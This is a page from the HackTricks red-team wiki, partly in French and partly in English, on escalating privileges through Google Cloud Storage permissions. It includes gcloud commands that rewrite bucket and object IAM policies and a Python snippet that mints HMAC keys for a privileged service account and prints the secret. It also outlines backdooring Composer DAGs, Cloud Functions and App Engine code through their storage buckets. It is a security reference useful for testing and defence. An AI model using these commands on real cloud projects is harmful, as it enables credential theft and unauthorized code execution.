GCP - Storage Privesc

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Storage

Basic Information:

GCP - Storage Enum

storage.objects.get

Cette permission vous permet de tĂ©lĂ©charger des fichiers stockĂ©s dans Cloud Storage. Cela peut potentiellement vous permettre d’escalader des privilĂšges car, dans certaines occasions, des informations sensibles y sont stockĂ©es. De plus, certains services GCP stockent leurs informations dans des buckets :

  • GCP Composer: Lorsque vous crĂ©ez un Composer Environment le code de tous les DAGs sera enregistrĂ© dans un bucket. Ces tĂąches peuvent contenir des informations intĂ©ressantes Ă  l’intĂ©rieur de leur code.
  • GCR (Container Registry): L’image des conteneurs est stockĂ©e dans des buckets, ce qui signifie que si vous pouvez lire les buckets vous pourrez tĂ©lĂ©charger les images et rechercher des leaks et/ou du code source.

storage.objects.setIamPolicy

Elle peut vous permettre d’abuser de n’importe lequel des scĂ©narios prĂ©cĂ©dents de cette section.

# Add binding
gcloud storage objects add-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role="<ROLE>" \
--project=<PROJECT_ID>

# Remove binding
gcloud storage objects remove-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role="<ROLE>" \
--project=<PROJECT_ID>

# Change Policy
gcloud storage objects set-iam-policy gs://<BUCKET_NAME>/<OBJECT_NAME> - \
--project=<PROJECT_ID> <<'POLICY'
{
"bindings": [
{
"role": "<ROLE>",
"members": [
"<MEMBER_TYPE>:<MEMBER_IDENTIFIER>"
]
}
]
}
POLICY

storage.buckets.setIamPolicy

Pour un exemple montrant comment modifier les autorisations avec cette permission, consultez cette page :

# Add binding
gcloud storage buckets add-iam-policy-binding gs://<MY_BUCKET> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role=<ROLE> \
--project=<MY_PROJECT>

# Remove binding
gcloud storage buckets remove-iam-policy-binding gs://<MY_BUCKET> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role=<ROLE> \
--project=<MY_PROJECT>

# Change policy
gcloud storage buckets set-iam-policy gs://<BUCKET_NAME> - \
--project=<PROJECT_ID> <<'POLICY'
{
"bindings": [
{
"role": "<ROLE>",
"members": [
"<MEMBER_TYPE>:<MEMBER_IDENTIFIER>"
]
}
]
}
POLICY

GCP - Public Buckets Privilege Escalation

storage.hmacKeys.create

La fonctionnalitĂ© “interoperability” de Cloud Storage, conçue pour les interactions cross-cloud comme avec AWS S3, implique la crĂ©ation de HMAC keys pour les Service Accounts et les utilisateurs. Un attaquant peut exploiter cela en gĂ©nĂ©rant une HMAC key pour un Service Account disposant de privilĂšges Ă©levĂ©s, entraĂźnant ainsi une escalade de privilĂšges au sein de Cloud Storage. Alors que les HMAC keys associĂ©es aux utilisateurs ne sont rĂ©cupĂ©rables que via la web console, les access and secret keys restent accessibles en permanence, permettant un stockage d’accĂšs de secours potentiel. En revanche, les HMAC keys liĂ©es aux Service Account sont accessibles via l’API, mais leurs access and secret keys ne sont pas rĂ©cupĂ©rables aprĂšs crĂ©ation, ce qui complique l’obtention d’un accĂšs continu.

# Create key
gsutil hmac create <sa-email> # You might need to execute this inside a VM instance

## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:
PROJECT_ID = '$PROJECT_ID'
TARGET_SERVICE_ACCOUNT = f"storage-sa@{PROJECT_ID}.iam.gserviceaccount.com"
ACCESS_TOKEN = "$CLOUDSDK_AUTH_ACCESS_TOKEN"
import requests
import json
key = requests.post(
f'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',
params={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}
).json()
#print(json.dumps(key, indent=4))
print(f'ID: {key["metadata"]["accessId"]}')
print(f'Secret: {key["secret"]}')


# Configure gsutil to use the HMAC key
gcloud config set pass_credentials_to_gsutil false
gsutil config -a

# Use it
gsutil ls gs://[BUCKET_NAME]

# Restore
gcloud config set pass_credentials_to_gsutil true

Another exploit script for this method can be found here.

storage.objects.create, storage.objects.delete = Storage Write permissions

In order to create a new object inside a bucket you need storage.objects.create and, according to the docs, you need also storage.objects.delete to modify an existent object.

A very common exploitation of buckets where you can write in cloud is in case the bucket is saving web server files, you might be able to store new code that will be used by the web application.

Composer

Composer is Apache Airflow managed inside GCP. It has several interesting features:

  • It runs inside a GKE cluster, so the SA the cluster uses is accessible by the code running inside Composer
  • All the components of a composer environments (code of DAGs, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and whenever a DAG is created or updated, submit a backdoored version so the composer environment will get from the storage the backdoored version.

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs

Cloud Functions

  • Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, overwriting the code before the new version gets built it’s possible to make the cloud function execute arbitrary code.

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions

App Engine

AppEngine versions generate some data inside a bucket with the format name: staging.<project-id>.appspot.com. Inside this bucket, it’s possible to find a folder called ae that will contain a folder per version of the AppEngine app and inside these folders it’ll be possible to find the manifest.json file. This file contains a json with all the files that must be used to create the specific version. Moreover, it’s possible to find the real names of the files, the URL to them inside the GCP bucket (the files inside the bucket changed their name for their sha1 hash) and the sha1 hash of each file.

Note that it’s not possible to pre-takeover this bucket because GCP users aren’t authorized to generate buckets using the domain name appspot.com.

However, with read & write access over this bucket, it’s possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code.

The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the staging.<project-id>.appspot.com bucket:

  • Upload the complete new code of the AppEngine version to a different and available bucket and prepare a manifest.json file with the new bucket name and sha1 hashes of them. Then, when a new version is created inside the bucket, you just need to modify the manifest.json file and upload the malicious one.
  • Upload a modified requirements.txt version that will use a the malicious dependencies code and update the manifest.json file with the new filename, URL and the hash of it.
  • Upload a modified main.py or app.yaml file that will execute the malicious code and update the manifest.json file with the new filename, URL and the hash of it.

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine

GCR

  • Google Container Registry stores the images inside buckets, if you can write those buckets you might be able to move laterally to where those buckets are being run.
  • The bucket used by GCR will have an URL similar to gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com (The top level subdomains are specified here).

Tip

This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does’t store the images in buckets.

References

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks